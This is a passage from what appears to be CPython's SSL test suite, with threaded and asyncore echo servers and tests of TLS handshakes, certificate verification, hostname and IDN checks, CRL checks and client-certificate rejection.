ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop. Call func(*args) depending on the error we get
# (WANT_READ or WANT_WRITE) move data between the socket and the BIOs.
timeout = kwargs.get('timeout', support.SHORT_TIMEOUT)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
@support.requires_resource('network')
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with socket_helper.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
elif rc == errno.ENETUNREACH:
self.skipTest("Network unreachable.")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with socket_helper.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(True)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ConnectionResetError, BrokenPipeError, ConnectionAbortedError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake.
# https://github.com/openssl/openssl/issues/6342
#
# ConnectionAbortedError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake when using WinSock.
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.close()
return False
except (ssl.SSLError, OSError) as e:
# OSError may occur with wrong protocols, e.g. both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
# bpo-44229, bpo-43855, bpo-44237, and bpo-33450:
# Ignore spurious EPROTOTYPE returned by write() on macOS.
# See also http://erickt.github.io/blog/2014/11/19/adventures-in-debugging-a-potential-osx-kernel-bug/
if e.errno != errno.EPROTOTYPE and sys.platform != "darwin":
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
if cert_binary is None:
sys.stdout.write(" client did not provide a cert\n")
else:
sys.stdout.write(f" cert binary is {len(cert_binary)}b\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
elif stripped == b'PHA':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: initiating post handshake auth\n")
try:
self.sslconn.verify_client_post_handshake()
except ssl.SSLError as e:
self.write(repr(e).encode("us-ascii") + b"\n")
else:
self.write(b"OK\n")
elif stripped == b'HASCERT':
if self.sslconn.getpeercert() is not None:
self.write(b'TRUE\n')
else:
self.write(b'FALSE\n')
elif stripped == b'GETCERT':
cert = self.sslconn.getpeercert()
self.write(repr(cert).encode("us-ascii") + b"\n")
elif stripped == b'VERIFIEDCHAIN':
certs = self.sslconn._sslobj.get_verified_chain()
self.write(len(certs).to_bytes(1, "big") + b"\n")
elif stripped == b'UNVERIFIEDCHAIN':
certs = self.sslconn._sslobj.get_unverified_chain()
self.write(len(certs).to_bytes(1, "big") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError as e:
# handles SSLError and socket errors
if self.server.chatty and support.verbose:
if isinstance(e, ConnectionError):
# OpenSSL 1.1.1 sometimes raises
# ConnectionResetError when connection is not
# shut down gracefully.
print(
f" Connection reset by peer: {self.addr}"
)
else:
handle_error("Test server failure:\n")
try:
self.write(b"ERROR\n")
except OSError:
pass
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = socket_helper.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(1.0)
self.sock.listen(5)
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except TimeoutError as e:
if support.verbose:
sys.stdout.write(f' connection timeout {e!r}\n')
except KeyboardInterrupt:
self.stop()
except BaseException as e:
if support.verbose and self.chatty:
sys.stdout.write(
' connection handling failed: ' + repr(e) + '\n')
self.close()
def close(self):
if self.sock is not None:
self.sock.close()
self.sock = None
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = socket_helper.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
with warnings_helper.check_warnings():
# ignore Deprecation warnings
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
min_version = PROTOCOL_TO_TLS_VERSION.get(client_protocol, None)
if (min_version is not None
# SSLContext.minimum_version is only available on recent OpenSSL
# (setter added in OpenSSL 1.1.0, getter added in OpenSSL 1.1.1)
and hasattr(server_context, 'minimum_version')
and server_protocol == ssl.PROTOCOL_TLS
and server_context.minimum_version > min_version
):
# If OpenSSL configuration is strict and requires more recent TLS
# version, we have to change the minimum to test old TLS versions.
with warnings_helper.check_warnings():
server_context.minimum_version = min_version
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
seclevel_workaround(server_context, client_context)
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(SIGNED_CERTFILE)
ctx.load_verify_locations(SIGNING_CA)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn(
'Cannot create a client socket with a PROTOCOL_TLS_SERVER context',
str(e.exception)
)
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn(
'Cannot create a client socket with a PROTOCOL_TLS_SERVER context',
str(e.exception)
)
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn(
'Cannot create a client socket with a PROTOCOL_TLS_SERVER context',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
@unittest.skipUnless(
ssl.HAS_NEVER_CHECK_COMMON_NAME, "test requires hostname_checks_common_name"
)
def test_hostname_checks_common_name(self):
client_context, server_context, hostname = testing_context()
assert client_context.hostname_checks_common_name
client_context.hostname_checks_common_name = False
# default cert has a SAN
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
client_context, server_context, hostname = testing_context(NOSANFILE)
client_context.hostname_checks_common_name = False
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLCertVerificationError):
s.connect((HOST, server.port))
def test_ecc_cert(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC cert
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_check_hostname_idn(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(IDNSANSFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify, when specified in several
# different ways
idn_hostnames = [
('könig.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
(b'xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('königsgäßchen.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
(b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
# ('königsgäßchen.idna2008.pythontest.net',
# 'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
(b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
]
for server_hostname, expected_hostname in idn_hostnames:
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=server_hostname) as s:
self.assertEqual(s.server_hostname, expected_hostname)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertEqual(s.server_hostname, expected_hostname)
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="python.example.org") as s:
with self.assertRaises(ssl.CertificateError):
s.connect((HOST, server.port))
def test_wrong_cert_tls12(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
# require TLS client authentication
server_context.verify_mode = ssl.CERT_REQUIRED
# TLS 1.3 has different handshake
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
@requires_tls_version('TLSv1_3')
def test_wrong_cert_tls13(self):
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.minimum_version = ssl.TLSVersion.TLSv1_3
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname,
suppress_ragged_eofs=False) as s:
# TLS 1.3 perform client cert exchange after handshake
s.connect((HOST, server.port))
try:
s.write(b'data')
s.read(1000)
s.write(b'should have failed already')
s.read(1000)
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = socket_helper.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
